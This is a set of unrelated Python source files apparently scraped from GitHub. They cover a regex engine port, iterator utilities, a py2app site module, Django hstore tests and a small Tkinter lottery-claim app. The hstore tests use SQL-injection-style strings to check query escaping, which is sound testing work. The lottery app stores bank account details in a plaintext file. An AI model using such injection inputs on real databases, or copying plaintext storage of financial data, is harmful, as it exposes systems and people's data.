# start TLS for security
s.starttls()
# Authentication
s.login(sender_email_id, password)
print(receiver_email_id)
# message to be sent
# sending the mail
s.sendmail(sender_email_id, receiver_email_id, text)
# terminating the session
s.quit()
# Defining the submit button
def check(self):
sel = self.ent1.get()
sel2 = self.ent2.get()
# text file
w = open("user_details.txt", "a+")
w.write("Account Holder Name: " + str(sel) + "\n")
w.write("Account Number: " + str(sel2) + "\n")
w.write("Bank: " + self.default_var.get() + " " + "&" + "\n")
w.write("Winnings Claimed at: " + str(now) + "\n")
w.close()
# Account holder error
if not sel.isalpha():
messagebox.showerror('Account Holder Name', 'Please make sure account holder name is entered correctly')
# Account number error
elif not sel2.isdigit():
messagebox.showerror('Account Number', 'Please make sure account number is entered correctly')
# No Bank selected error
elif self.default_var.get() == "Select Bank":
messagebox.showerror('Bank', 'Please select a bank')
else:
self.verify()
self.exit_btn()
# Defining my clear button
def clear(self):
playsound("clear.mp3")
self.ent1.delete(0, END)
self.ent2.delete(0, END)
self.default_var.set(self.default_txt)
self.ent3.delete(0, END)
self.ent4['state'] = "normal"
self.ent4.delete(0, END)
self.ent4['state'] = "readonly"
# Defining my exit button with messagebox
def exit_btn(self):
playsound("exit.mp3")
msg = messagebox.askquestion("Termination", "Are you sure you want to close the program?")
if msg == "yes":
root.destroy()
obj_BankDetails = BankDetails(root)
# Run Program
root.mainloop()
| DevinFledermaus/Lotto_EOMP | main3.py | main3.py | py | 7,008 | python | en | code | 0 | github-code | 36 |
43302270494 | """
This is not used in a PyPy translation, but it can be used
in RPython code. It exports the same interface as the
Python 're' module. You can call the functions at the start
of the module (expect the ones with @not_rpython for now).
They must be called with a *constant* pattern string.
"""
import re, sys
from rpython.rlib.rsre import rsre_core, rsre_char
from rpython.rlib.rsre.rpy import get_code as _get_code
from rpython.rlib.unicodedata import unicodedb
from rpython.rlib.objectmodel import specialize, we_are_translated
from rpython.rlib.objectmodel import not_rpython
rsre_char.set_unicode_db(unicodedb)
I = IGNORECASE = re.I # ignore case
L = LOCALE = re.L # assume current 8-bit locale
U = UNICODE = re.U # assume unicode locale
M = MULTILINE = re.M # make anchors look for newline
S = DOTALL = re.S # make dot match newline
X = VERBOSE = re.X # ignore whitespace and comments
@specialize.call_location()
def match(pattern, string, flags=0):
return compile(pattern, flags).match(string)
@specialize.call_location()
def search(pattern, string, flags=0):
return compile(pattern, flags).search(string)
@specialize.call_location()
def findall(pattern, string, flags=0):
return compile(pattern, flags).findall(string)
@specialize.call_location()
def finditer(pattern, string, flags=0):
return compile(pattern, flags).finditer(string)
@not_rpython
def sub(pattern, repl, string, count=0):
return compile(pattern).sub(repl, string, count)
@not_rpython
def subn(pattern, repl, string, count=0):
return compile(pattern).subn(repl, string, count)
@specialize.call_location()
def split(pattern, string, maxsplit=0):
return compile(pattern).split(string, maxsplit)
@specialize.memo()
def compile(pattern, flags=0):
code, flags, args = _get_code(pattern, flags, allargs=True)
return RSREPattern(pattern, code, flags, *args)
escape = re.escape
error = re.error
class RSREPattern(object):
def __init__(self, pattern, code, flags,
num_groups, groupindex, indexgroup):
self._code = code
self.pattern = pattern
self.flags = flags
self.groups = num_groups
self.groupindex = groupindex
self._indexgroup = indexgroup
def match(self, string, pos=0, endpos=sys.maxint):
return self._make_match(rsre_core.match(self._code, string,
pos, endpos))
def search(self, string, pos=0, endpos=sys.maxint):
return self._make_match(rsre_core.search(self._code, string,
pos, endpos))
def findall(self, string, pos=0, endpos=sys.maxint):
matchlist = []
scanner = self.scanner(string, pos, endpos)
while True:
match = scanner.search()
if match is None:
break
if self.groups == 0 or self.groups == 1:
item = match.group(self.groups)
else:
assert False, ("findall() not supported if there is more "
"than one group: not valid RPython")
item = match.groups("")
matchlist.append(item)
return matchlist
def finditer(self, string, pos=0, endpos=sys.maxint):
scanner = self.scanner(string, pos, endpos)
while True:
match = scanner.search()
if match is None:
break
yield match
@not_rpython
def subn(self, repl, string, count=0):
filter = repl
if not callable(repl) and "\\" in repl:
# handle non-literal strings; hand it over to the template compiler
filter = re._subx(self, repl)
start = 0
sublist = []
force_unicode = (isinstance(string, unicode) or
isinstance(repl, unicode))
n = last_pos = 0
while not count or n < count:
match = rsre_core.search(self._code, string, start)
if match is None:
break
if last_pos < match.match_start:
sublist.append(string[last_pos:match.match_start])
if not (last_pos == match.match_start
== match.match_end and n > 0):
# the above ignores empty matches on latest position
if callable(filter):
piece = filter(self._make_match(match))
else:
piece = filter
sublist.append(piece)
last_pos = match.match_end
n += 1
elif last_pos >= len(string):
break # empty match at the end: finished
#
start = match.match_end
if start == match.match_start:
start += 1
if last_pos < len(string):
sublist.append(string[last_pos:])
if n == 0:
# not just an optimization -- see test_sub_unicode
return string, n
if force_unicode:
item = u"".join(sublist)
else:
item = "".join(sublist)
return item, n
@not_rpython
def sub(self, repl, string, count=0):
item, n = self.subn(repl, string, count)
return item
def split(self, string, maxsplit=0):
splitlist = []
start = 0
n = 0
last = 0
while not maxsplit or n < maxsplit:
match = rsre_core.search(self._code, string, start)
if match is None:
break
if match.match_start == match.match_end: # zero-width match
if match.match_start == len(string): # at end of string
break
start = match.match_end + 1
continue
splitlist.append(string[last:match.match_start])
# add groups (if any)
if self.groups:
match1 = self._make_match(match)
splitlist.extend(match1.groups(None))
n += 1
last = start = match.match_end
splitlist.append(string[last:])
return splitlist
def scanner(self, string, start=0, end=sys.maxint):
return SREScanner(self, string, start, end)
def _make_match(self, res):
if res is None:
return None
return RSREMatch(self, res)
class RSREMatch(object):
def __init__(self, pattern, ctx):
self.re = pattern
self._ctx = ctx
def span(self, groupnum=0):
# if not isinstance(groupnum, (int, long)):
# groupnum = self.re.groupindex[groupnum]
return self._ctx.span(groupnum)
def start(self, groupnum=0):
return self.span(groupnum)[0]
def end(self, groupnum=0):
return self.span(groupnum)[1]
def group(self, group=0):
frm, to = self.span(group)
if 0 <= frm <= to:
return self._ctx._string[frm:to]
else:
return None
# def group(self, *groups):
# groups = groups or (0,)
# result = []
# for group in groups:
# frm, to = self.span(group)
# if 0 <= frm <= to:
# result.append(self._ctx._string[frm:to])
# else:
# result.append(None)
# if len(result) > 1:
# return tuple(result)
def groups(self, default=None):
fmarks = self._ctx.flatten_marks()
grps = []
for i in range(1, self.re.groups+1):
grp = self.group(i)
if grp is None: grp = default
grps.append(grp)
if not we_are_translated():
grps = tuple(grps) # xxx mostly to make tests happy
return grps
def groupdict(self, default=None):
d = {}
for key, value in self.re.groupindex.iteritems():
grp = self.group(value)
if grp is None: grp = default
d[key] = grp
return d
def expand(self, template):
return re._expand(self.re, self, template)
@property
def regs(self):
fmarks = self._ctx.flatten_marks()
return tuple([(fmarks[i], fmarks[i+1])
for i in range(0, len(fmarks), 2)])
@property
def lastindex(self):
self._ctx.flatten_marks()
if self._ctx.match_lastindex < 0:
return None
return self._ctx.match_lastindex // 2 + 1
@property
def lastgroup(self):
lastindex = self.lastindex
if lastindex < 0 or lastindex >= len(self.re._indexgroup):
return None
return self.re._indexgroup[lastindex]
@property
def string(self):
return self._ctx._string
@property
def pos(self):
return self._ctx.match_start
@property
def endpos(self):
return self._ctx.end
class SREScanner(object):
def __init__(self, pattern, string, start, end):
self.pattern = pattern
self._string = string
self._start = start
self._end = end
def _match_search(self, matcher):
if self._start > len(self._string):
return None
match = matcher(self._string, self._start, self._end)
if match is None:
self._start += 1 # obscure corner case
else:
self._start = match.end()
if match.start() == self._start:
self._start += 1
return match
def match(self):
return self._match_search(self.pattern.match)
def search(self):
return self._match_search(self.pattern.search)
class Scanner:
# This class is copied directly from re.py.
def __init__(self, lexicon, flags=0):
from rpython.rlib.rsre.rpy.sre_constants import BRANCH, SUBPATTERN
from rpython.rlib.rsre.rpy import sre_parse
self.lexicon = lexicon
# combine phrases into a compound pattern
p = []
s = sre_parse.Pattern()
s.flags = flags
for phrase, action in lexicon:
p.append(sre_parse.SubPattern(s, [
(SUBPATTERN, (len(p)+1, sre_parse.parse(phrase, flags))),
]))
s.groups = len(p)+1
p = sre_parse.SubPattern(s, [(BRANCH, (None, p))])
self.scanner = compile(p)
def scan(self, string):
result = []
append = result.append
match = self.scanner.scanner(string).match
i = 0
while 1:
m = match()
if not m:
break
j = m.end()
if i == j:
break
action = self.lexicon[m.lastindex-1][1]
if callable(action):
self.match = m
action = action(self, m.group())
if action is not None:
append(action)
i = j
return result, string[i:]
| mozillazg/pypy | rpython/rlib/rsre/rsre_re.py | rsre_re.py | py | 10,856 | python | en | code | 430 | github-code | 36 |
15287706589 | ##encoding=UTF8
"""
This module provides high performance iterator recipes.
best time and memory complexity implementation applied.
compatible: python2 and python3
import:
from .iterable import (take, flatten, flatten_all, nth, shuffled, grouper, grouper_dict, grouper_list,
running_windows, cycle_running_windows, cycle_slice, count_generator)
"""
from __future__ import print_function
import collections
import itertools
import random
import sys
is_py2 = (sys.version_info[0] == 2)
if is_py2:
from itertools import ifilterfalse as filterfalse, izip_longest as zip_longest
else: # in python3
from itertools import filterfalse, zip_longest
def take(n, iterable):
"Return first n items of the iterable as a list"
return list(itertools.islice(iterable, n))
def flatten(listOfLists):
"Flatten one level of nesting"
return itertools.chain.from_iterable(listOfLists)
def flatten_all(listOfLists):
"Flatten arbitrary depth of nesting, better for unknown nesting structure iterable object"
for i in listOfLists:
if hasattr(i, "__iter__"):
for j in flatten_all(i):
yield j
else:
yield i
def nth(iterable, n, default=None):
"Returns the nth item or a default value"
return next(itertools.islice(iterable, n, None), default)
def shuffled(iterable):
"Returns the shuffled iterable"
return random.sample(iterable, len(iterable))
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return zip_longest(fillvalue=fillvalue, *args)
def grouper_dict(DICT, n):
"evenly divide DICTIONARY into fixed-length piece, no filled value if chunk size smaller than fixed-length"
for group in grouper(DICT, n):
chunk_d = dict()
for k in group:
if k != None:
chunk_d[k] = DICT[k]
yield chunk_d
def grouper_list(LIST, n):
"evenly divide LIST into fixed-length piece, no filled value if chunk size smaller than fixed-length"
for group in grouper(LIST, n):
chunk_l = list()
for i in group:
if i != None:
chunk_l.append(i)
yield chunk_l
def running_windows(iterable, size):
"""generate n-size running windows
e.g. iterable = [1,2,3,4,5], size = 3
yield: [1,2,3], [2,3,4], [3,4,5]
"""
fifo = collections.deque(maxlen=size)
for i in iterable:
fifo.append(i)
if len(fifo) == size:
yield list(fifo)
def cycle_running_windows(iterable, size):
"""generate n-size cycle running windows
e.g. iterable = [1,2,3,4,5], size = 2
yield: [1,2], [2,3], [3,4], [4,5], [5,1]
"""
fifo = collections.deque(maxlen=size)
cycle = itertools.cycle(iterable)
counter = itertools.count(1)
length = len(iterable)
for i in cycle:
fifo.append(i)
if len(fifo) == size:
yield list(fifo)
if next(counter) == length:
break
def cycle_slice(LIST, start, end): # 测试阶段, 不实用
"""given a list, return right hand cycle direction slice from start to end
e.g.
array = [0,1,2,3,4,5,6,7,8,9]
cycle_slice(array, 4, 7) -> [4,5,6,7]
cycle_slice(array, 8, 2) -> [8,9,0,1,2]
"""
if type(LIST) != list:
LIST = list(LIST)
if end >= start:
return LIST[start:end+1]
else:
return LIST[start:] + LIST[:end+1]
def padding_left_shift(array, left_shift):
"""padding_left_shift([1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4], 1)
[1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4] to
[1, 1, 2, 2, 2, 2, 2, 4, 4, 4, 4]
"""
new_array = collections.deque(array)
last = new_array[-1]
new_array.rotate(-left_shift)
for _ in range(left_shift):
new_array.pop()
for _ in range(left_shift):
new_array.append(last)
return new_array
def padding_right_shift(array, right_shift):
"""padding_right_shift([1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4], 1)
[1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4] to
[1, 1, 1, 1, 2, 2, 2, 2, 2, 4, 4]
"""
new_array = collections.deque(array)
first = new_array[0]
new_array.rotate(right_shift)
for _ in range(right_shift):
new_array.popleft()
for _ in range(right_shift):
new_array.appendleft(first)
return new_array
def count_generator(generator, memory_efficient=True):
"""count number of item in generator
memory_efficient=True, 3 times slower, but memory_efficient
memory_efficient=False, faster, but cost more memory
"""
if memory_efficient:
counter = 0
for _ in generator:
counter += 1
return counter
else:
return len(list(generator))
if __name__ == "__main__":
from angora.GADGET.pytimer import Timer
import time
import unittest
timer = Timer()
class IterToolsUnittest(unittest.TestCase):
def setUp(self):
self.iterable_generator = range(10)
self.iterable_list = list(range(10))
self.iterable_set = set(list(range(10)))
self.iterable_dict = {i: chr(j) for i, j in zip(range(1, 11), range(65, 75))}
def test_take(self):
self.assertEqual(take(5, self.iterable_generator), [0, 1, 2, 3, 4])
self.assertEqual(take(5, self.iterable_list), [0, 1, 2, 3, 4])
self.assertEqual(take(5, self.iterable_set), [0, 1, 2, 3, 4])
self.assertEqual(take(5, self.iterable_dict), [1, 2, 3, 4, 5])
def test_flatten(self):
"""测试flatten的性能, 应该要比二重循环性能好
"""
complexity = 1000
iterable = [list(range(complexity))] * complexity
timer.start()
for _ in flatten(iterable):
pass
print("fatten method takes %.6f second" % timer.stop())
timer.start()
for chunk in iterable:
for _ in chunk:
pass
print("double for loop method takes %.6f second" % timer.stop())
def test_flatten_all(self):
"""flatten_all slower, but more convenient. And you don't need to know how iterable
nested in each other.
"""
complexity = 100
iterable = [[list(range(complexity))] * complexity] * complexity
timer.start()
for _ in flatten_all(iterable):
pass
print("fatten_all method takes %.6f second" % timer.stop())
timer.start()
for chunk1 in iterable:
for chunk2 in chunk1:
for _ in chunk2:
pass
print("nested for loop method takes %.6f second" % timer.stop())
def test_nth(self):
self.assertEqual(nth(self.iterable_list, 5), 5)
def test_count_generator(self):
self.assertEqual(count_generator(self.iterable_generator), 10)
def number_generator():
for i in range(1000000):
yield i
timer.start()
count_generator(number_generator(), memory_efficient=True)
print("memory_efficient way takes %s second" % timer.stop())
timer.start()
count_generator(number_generator(), memory_efficient=False)
print("non-memory_efficient way takes %s second" % timer.stop())
unittest.main()
def test_flatten():
"""测试flatten的性能
"""
print("{:=^40}".format("test_flatten"))
complexity = 1000
a = [[1,2,3],[4,5,6],[7,8,9,10]] * complexity
st = time.clock()
for _ in flatten(a):
pass
print(time.clock() - st)
st = time.clock()
for chunk in a:
for _ in chunk:
pass
print(time.clock() - st)
# test_flatten()
def test_flatten_all():
"""测试flatten_all的性能
"""
print("{:=^40}".format("test_flatten_all"))
complexity = 1000
a = [[1,2,3],[4,[5,6],[7,8]], [9,10]] * complexity
b = range(complexity * 10)
st = time.clock()
for _ in flatten_all(a):
pass
print(time.clock() - st)
st = time.clock()
for _ in b:
pass
print(time.clock() - st)
# test_flatten_all()
def test_nth():
"""测试nth的性能
"""
print("{:=^40}".format("test_flatten_all"))
n = 10000
array = [i for i in range(n)]
st = time.clock()
for i in range(n):
_ = array[i]
print(time.clock() - st)
st = time.clock()
for i in range(n):
_ = nth(array, i)
print(time.clock() - st)
st = time.clock()
for i in array:
_ = i
print(time.clock() - st)
# test_nth()
def test_grouper():
"""Test for grouper, grouper_list, grouper_dict
"""
print("{:=^40}".format("test_grouper"))
for chunk in grouper("abcdefg",3):
print(chunk)
# test_grouper()
def test_grouper_dict_list():
"""Test for grouper_dict, grouper_list
"""
print("{:=^40}".format("test_grouper_dict_list"))
print("=== test for grouper_dict ===")
a = {key: "hello" for key in range(10)} ## test grouper_list
for chunk_d in grouper_dict(a, 3):
print(chunk_d)
print("=== test for grouper_list ===")
complexity = 1000000
timer.start()
b = range(complexity) # test grouper_dict
for chunk_l in grouper_list(b, 1000):
# print(chunk_l)
pass
timer.timeup()
timer.start()
chunk_l = list()
for i in b:
chunk_l.append(i)
if len(chunk_l) == 1000:
# print(chunk_l)
chunk_l = list()
# print(chunk_l)
timer.timeup()
# test_grouper_dict_list()
def timetest_grouper():
array = [[1,2,3] for _ in range(1000)]
def regular():
for item in array:
pass
def use_grouper():
for chunk_l in grouper_list(array, 10):
for item in chunk_l:
pass
timer.test(regular, 1000)
timer.test(use_grouper, 1000)
# timetest_grouper()
def test_running_windows():
print("{:=^40}".format("test_running_windows"))
array = [0,1,2,3,4]
print("Testing running windows")
for i in running_windows(array,3): # 测试 窗宽 = 3
print(i)
for i in running_windows(array, 1): # 测试 窗宽 = 1
print(i)
for i in running_windows(array, 0): # 测试 窗宽 = 0
print(i)
print("Testing cycle running windows")
for i in cycle_running_windows(array, 3): # 测试 窗宽 = 3
print(i)
for i in cycle_running_windows(array, 1): # 测试 窗宽 = 1
print(i)
for i in cycle_running_windows(array, 0): # 测试 窗宽 = 0
print(i)
# test_running_windows()
def test_cycle_slice():
print("{:=^40}".format("test_cycle_slice"))
array = [0,1,2,3,4,5,6,7,8,9]
print("Testing cycle slice")
print(cycle_slice(array, 3, 6) )
print(cycle_slice(array, 6, 3) )
# test_cycle_slice()
def test_padding_shift():
print("{:=^40}".format("test_padding_shift"))
array = [1,1,1,2,2,2,2,2,4,4,4]
print(padding_left_shift(array, 1))
print(padding_right_shift(array, 1))
# test_padding_shift() | MacHu-GWU/Angora | angora/DATA/iterable.py | iterable.py | py | 12,109 | python | en | code | 0 | github-code | 36 |
27045433039 | import sys
import pysnooper
@pysnooper.snoop()
def lengthOfLongestSubstring(s: str) -> int:
a_ls = [x for x in s]
max_len = 0
substring = []
for a in a_ls:
if a in substring:
idx = substring.index(a)
substring = substring[idx + 1:]
substring.append(a)
if max_len < len(substring):
max_len = len(substring)
return max_len
if __name__ == "__main__":
max_len = lengthOfLongestSubstring(sys.argv[1])
print(max_len)
| ikedaosushi/python-sandbox | pysnoozer/lengthOfLongestSubstring.py | lengthOfLongestSubstring.py | py | 504 | python | en | code | 11 | github-code | 36 |
31829434038 | """
Append module search paths for third-party packages to sys.path.
This is stripped down and customized for use in py2app applications
"""
import sys
# os is actually in the zip, so we need to do this here.
# we can't call it python24.zip because zlib is not a built-in module (!)
_libdir = '/lib/python' + sys.version[:3]
_parent = '/'.join(__file__.split('/')[:-1])
if not _parent.endswith(_libdir):
_parent += _libdir
sys.path.append(_parent + '/site-packages.zip')
# Stuffit decompresses recursively by default, that can mess up py2app bundles,
# add the uncompressed site-packages to the path to compensate for that.
sys.path.append(_parent + '/site-packages')
import os
try:
basestring
except NameError:
basestring = str
def makepath(*paths):
dir = os.path.abspath(os.path.join(*paths))
return dir, os.path.normcase(dir)
for m in sys.modules.values():
f = getattr(m, '__file__', None)
if isinstance(f, basestring) and os.path.exists(f):
m.__file__ = os.path.abspath(m.__file__)
del m
# This ensures that the initial path provided by the interpreter contains
# only absolute pathnames, even if we're running from the build directory.
L = []
_dirs_in_sys_path = {}
dir = dircase = None # sys.path may be empty at this point
for dir in sys.path:
# Filter out duplicate paths (on case-insensitive file systems also
# if they only differ in case); turn relative paths into absolute
# paths.
dir, dircase = makepath(dir)
if not dircase in _dirs_in_sys_path:
L.append(dir)
_dirs_in_sys_path[dircase] = 1
sys.path[:] = L
del dir, dircase, L
_dirs_in_sys_path = None
def _init_pathinfo():
global _dirs_in_sys_path
_dirs_in_sys_path = d = {}
for dir in sys.path:
if dir and not os.path.isdir(dir):
continue
dir, dircase = makepath(dir)
d[dircase] = 1
def addsitedir(sitedir):
global _dirs_in_sys_path
if _dirs_in_sys_path is None:
_init_pathinfo()
reset = 1
else:
reset = 0
sitedir, sitedircase = makepath(sitedir)
if not sitedircase in _dirs_in_sys_path:
sys.path.append(sitedir) # Add path component
try:
names = os.listdir(sitedir)
except os.error:
return
names.sort()
for name in names:
if name[-4:] == os.extsep + "pth":
addpackage(sitedir, name)
if reset:
_dirs_in_sys_path = None
def addpackage(sitedir, name):
global _dirs_in_sys_path
if _dirs_in_sys_path is None:
_init_pathinfo()
reset = 1
else:
reset = 0
fullname = os.path.join(sitedir, name)
try:
f = open(fullname)
except IOError:
return
while 1:
dir = f.readline()
if not dir:
break
if dir[0] == '#':
continue
if dir.startswith("import"):
exec(dir)
continue
if dir[-1] == '\n':
dir = dir[:-1]
dir, dircase = makepath(sitedir, dir)
if not dircase in _dirs_in_sys_path and os.path.exists(dir):
sys.path.append(dir)
_dirs_in_sys_path[dircase] = 1
if reset:
_dirs_in_sys_path = None
#sys.setdefaultencoding('utf-8')
#
# Run custom site specific code, if available.
#
try:
import sitecustomize
except ImportError:
pass
#
# Remove sys.setdefaultencoding() so that users cannot change the
# encoding after initialization. The test for presence is needed when
# this module is run as a script, because this code is executed twice.
#
if hasattr(sys, "setdefaultencoding"):
del sys.setdefaultencoding
| LettError/responsiveLettering | ResponsiveLettering.glyphsPlugin/Contents/Resources/site.py | site.py | py | 3,645 | python | en | code | 152 | github-code | 36 |
73269742825 | def checkCompletion(access_token,client_id):
import wunderpy2
import pygsheets
import datetime
x = 2
gc = pygsheets.authorize()
sh = gc.open('wunderlist_update')
wks = sh.sheet1
api = wunderpy2.WunderApi()
client = api.get_client(access_token, client_id)
current_rows = wks.get_all_values()
for row_data in current_rows:
if row_data[2] == 'TRUE':
x = x + 1
if row_data[2] == 'FALSE':
wunder_id = row_data[0]
listo = client.get_task(task_id=wunder_id)
if str(listo['completed']) == 'FALSE':
x = x + 1
if str(listo['completed']) == 'TRUE':
date_now = datetime.datetime.now().date()
wks.update_cell('C' + str(x), 'TRUE')
wks.update_cell('E' + str(x), str(date_now))
x = x + 1 | krishan147/wundersheet | wundersheet/check_task_completion.py | check_task_completion.py | py | 876 | python | en | code | 0 | github-code | 36 |
17884032715 | import logging
import os
import types
from typing import Optional
import core.algorithms as algorithms
from features.extensions.extensionlib import BaseExtension, BaseInterface
from packages.document_server.docserver import Server
logger = logging.getLogger(__name__)
class Extension(BaseExtension):
server = Server(os.path.dirname(algorithms.__file__))
def on_load(self):
logger.info(f'帮助文档服务器:http://127.0.0.1:{self.server.port}')
self.server.run()
class Interface(BaseInterface):
def __init__(self):
self.browser_id: Optional[int] = None
# 记忆上次打开的浏览器id,这样可以保证下次打开帮助文档的时候和上次打开的是同一个内置浏览器,从而节省内存+方便交互。
def open_by_function_name(self, name: str):
"""
对于`pyminer_algorithms`内的函数,按函数名打开文档
:param name: 需要打开的`algorithms`内的函数
:return:
"""
attr_list = dir(algorithms)
if name in attr_list:
func = getattr(algorithms, name)
self.open_by_function_object(func)
def open_external_search_result(self, word_to_search: str):
"""
打开外部搜索链接
:param word_to_search:
:return:
"""
path = 'https://cn.bing.com/search?q=%s' % word_to_search
if self.browser_id is None:
self.browser_id = self.extension.extension_lib.get_interface('embedded_browser').open_url(url=path,
side='right')
else:
self.browser_id = self.extension.extension_lib.get_interface('embedded_browser').open_url(
url=path, browser_id=self.browser_id, side='right')
def open_by_function_object(self, function: types.FunctionType):
"""
传入一个函数,就可以在浏览器中打开帮助文档。
:param function: 这是一个函数,是Callable的函数,不是函数名
:return:
"""
# 关于path的处理说明:将模块路径转换为文件路径
# >>> array.__module__
# 'algorithms.linear_algebra.array'
# >>> array.__module__.split('.', maxsplit=1)[1]
# 'linear_algebra.array'
# >>> array.__module__.split('.', maxsplit=1)[1].replace('.', '/')
# 'linear_algebra/array'
path = function.__module__.split('.', maxsplit=1)[1]
path = path.replace('.', '/')
path = f'{path}.md'
# 以下这4行代码看起来似乎是没用的
if path.startswith('/'):
path = path[1:]
if path.startswith('\\'):
path = path[1:]
# 在内置浏览器中打开帮助文档
port = Extension.server.port
path = f'http://127.0.0.1:{port}/{path}'
embedded_browser = self.extension.extension_lib.get_interface('embedded_browser')
if self.browser_id is None:
self.browser_id = embedded_browser.open_url(url=path, side='right')
else:
self.browser_id = embedded_browser.open_url(url=path, browser_id=self.browser_id, side='right')
| pyminer/pyminer | pyminer/packages/document_server/main.py | main.py | py | 3,241 | python | en | code | 77 | github-code | 36 |
7426504454 | from maltego_trx.transform import DiscoverableTransform
from db import db
from utils import row_dict_to_conversation_email
class EmailAddressToRecievers(DiscoverableTransform):
"""
Given a maltego.EmailAddress Entity, return the set of Emails sent by that address from the Enron dataset.
"""
@classmethod
def create_entities(cls, request, response):
email_address = request.Value
domain = request.getTransformSetting('domain')
minSend = int(request.getTransformSetting('minSend'))
res = db.get_recipients_by_email(email_address, domain, minSend, limit=request.Slider)
for d in res:
for r in d['recipients']:
ent = response.addEntity('maltego.EmailAddress', r)
| crest42/enron | transforms/EmailAddressToRecievers.py | EmailAddressToRecievers.py | py | 752 | python | en | code | 0 | github-code | 36 |
12028607497 | # -*- coding: utf-8 -*-
from django.db import connections
from django.db.models.aggregates import Count
from django.utils.unittest import TestCase
from django_orm.postgresql.hstore.functions import HstoreKeys, HstoreSlice, HstorePeek
from django_orm.postgresql.hstore.expressions import HstoreExpression
from .models import DataBag, Ref, RefsBag
class TestDictionaryField(TestCase):
def setUp(self):
DataBag.objects.all().delete()
def _create_bags(self):
alpha = DataBag.objects.create(name='alpha', data={'v': '1', 'v2': '3'})
beta = DataBag.objects.create(name='beta', data={'v': '2', 'v2': '4'})
return alpha, beta
def _create_bitfield_bags(self):
# create dictionaries with bits as dictionary keys (i.e. bag5 = { 'b0':'1', 'b2':'1'})
for i in xrange(10):
DataBag.objects.create(name='bag%d' % (i,),
data=dict(('b%d' % (bit,), '1') for bit in xrange(4) if (1 << bit) & i))
def test_empty_instantiation(self):
bag = DataBag.objects.create(name='bag')
self.assertTrue(isinstance(bag.data, dict))
self.assertEqual(bag.data, {})
def test_named_querying(self):
alpha, beta = self._create_bags()
instance = DataBag.objects.get(name='alpha')
self.assertEqual(instance, alpha)
instance = DataBag.objects.filter(name='beta')[0]
self.assertEqual(instance, beta)
def test_annotations(self):
self._create_bitfield_bags()
queryset = DataBag.objects\
.annotate(num_id=Count('id'))\
.filter(num_id=1)
self.assertEqual(queryset[0].num_id, 1)
def test_unicode_processing(self):
greets = {
u'de': u'Gr\xfc\xdfe, Welt',
u'en': u'hello, world',
u'es': u'hola, ma\xf1ana',
u'he': u'\u05e9\u05dc\u05d5\u05dd, \u05e2\u05d5\u05dc\u05dd',
u'jp': u'\u3053\u3093\u306b\u3061\u306f\u3001\u4e16\u754c',
u'zh': u'\u4f60\u597d\uff0c\u4e16\u754c',
}
DataBag.objects.create(name='multilang', data=greets)
instance = DataBag.objects.get(name='multilang')
self.assertEqual(greets, instance.data)
def test_query_escaping(self):
me = self
def readwrite(s):
# try create and query with potentially illegal characters in the field and dictionary key/value
o = DataBag.objects.create(name=s, data={ s: s })
me.assertEqual(o, DataBag.objects.get(name=s, data={ s: s }))
readwrite('\' select')
readwrite('% select')
readwrite('\\\' select')
readwrite('-- select')
readwrite('\n select')
readwrite('\r select')
readwrite('* select')
def test_replace_full_dictionary(self):
DataBag.objects.create(name='foo', data={ 'change': 'old value', 'remove': 'baz'})
replacement = { 'change': 'new value', 'added': 'new'}
DataBag.objects.filter(name='foo').update(data=replacement)
instance = DataBag.objects.get(name='foo')
self.assertEqual(replacement, instance.data)
def test_equivalence_querying(self):
alpha, beta = self._create_bags()
for bag in (alpha, beta):
data = {'v': bag.data['v'], 'v2': bag.data['v2']}
instance = DataBag.objects.get(data=data)
self.assertEqual(instance, bag)
r = DataBag.objects.filter(data=data)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], bag)
def test_hkeys(self):
alpha, beta = self._create_bags()
instance = DataBag.objects.filter(id=alpha.id)
self.assertEqual(instance.hkeys('data'), ['v', 'v2'])
instance = DataBag.objects.filter(id=beta.id)
self.assertEqual(instance.hkeys('data'), ['v', 'v2'])
def test_hkeys_annotation(self):
alpha, beta = self._create_bags()
queryset = DataBag.objects.annotate_functions(keys=HstoreKeys("data"))
self.assertEqual(queryset[0].keys, ['v', 'v2'])
self.assertEqual(queryset[1].keys, ['v', 'v2'])
def test_hpeek(self):
alpha, beta = self._create_bags()
queryset = DataBag.objects.filter(id=alpha.id)
self.assertEqual(queryset.hpeek(attr='data', key='v'), '1')
self.assertEqual(queryset.hpeek(attr='data', key='invalid'), None)
def test_hpeek_annotation(self):
alpha, beta = self._create_bags()
queryset = DataBag.objects.annotate_functions(peeked=HstorePeek("data", "v"))
self.assertEqual(queryset[0].peeked, "1")
self.assertEqual(queryset[1].peeked, "2")
def test_hremove(self):
alpha, beta = self._create_bags()
instance = DataBag.objects.get(name='alpha')
self.assertEqual(instance.data, alpha.data)
DataBag.objects.filter(name='alpha').hremove('data', 'v2')
instance = DataBag.objects.get(name='alpha')
self.assertEqual(instance.data, {'v': '1'})
instance = DataBag.objects.get(name='beta')
self.assertEqual(instance.data, beta.data)
DataBag.objects.filter(name='beta').hremove('data', ['v', 'v2'])
instance = DataBag.objects.get(name='beta')
self.assertEqual(instance.data, {})
def test_hslice(self):
alpha, beta = self._create_bags()
queryset = DataBag.objects.filter(id=alpha.id)
self.assertEqual(queryset.hslice(attr='data', keys=['v']), {'v': '1'})
self.assertEqual(queryset.hslice(attr='data', keys=['invalid']), {})
def test_hslice_annotation(self):
alpha, beta = self._create_bags()
queryset = DataBag.objects.annotate_functions(sliced=HstoreSlice("data", ['v']))
self.assertEqual(queryset.count(), 2)
self.assertEqual(queryset[0].sliced, {'v': '1'})
def test_hupdate(self):
alpha, beta = self._create_bags()
self.assertEqual(DataBag.objects.get(name='alpha').data, alpha.data)
DataBag.objects.filter(name='alpha').hupdate('data', {'v2': '10', 'v3': '20'})
self.assertEqual(DataBag.objects.get(name='alpha').data, {'v': '1', 'v2': '10', 'v3': '20'})
def test_key_value_subset_querying(self):
alpha, beta = self._create_bags()
for bag in (alpha, beta):
qs = DataBag.objects.where(
HstoreExpression("data").contains({'v': bag.data['v']})
)
self.assertEqual(len(qs), 1)
self.assertEqual(qs[0], bag)
qs = DataBag.objects.where(
HstoreExpression("data").contains({'v': bag.data['v'], 'v2': bag.data['v2']})
)
self.assertEqual(len(qs), 1)
self.assertEqual(qs[0], bag)
